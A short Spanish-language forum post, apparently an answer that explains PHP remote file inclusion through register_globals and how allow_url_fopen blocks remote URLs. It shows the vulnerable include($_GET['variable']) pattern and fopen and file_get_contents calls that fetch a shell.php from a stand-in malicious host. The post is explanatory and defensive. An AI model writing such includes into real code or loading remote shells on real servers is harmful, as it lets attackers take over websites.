Código:
$_POST['variable']
$_GET['variable']
si el programador manejase una variable llamada "variable" en su sitio y la
usara para realizar un include algo asi
Código:
include($variable);
y el include se haria del archivo shell.php
mejor dicho incluirias codigo malicioa en tu pagina
pero si register_globals estuviese en off esto no funcionaria por que deberia haber un include de la forma
Código:
include($_GET['variable']);
ahora mira allow_url_fopen
deshabilita las url remotas en funciones como fopen , file_get_contents, etc
por ejemplo tu no podrias hacer esto
Código:
fopen("http.//www.webmaliciosa.com/shell.php","r")
file_get_contents("http.//www.webmaliciosa.com/shell.php")
Saludos.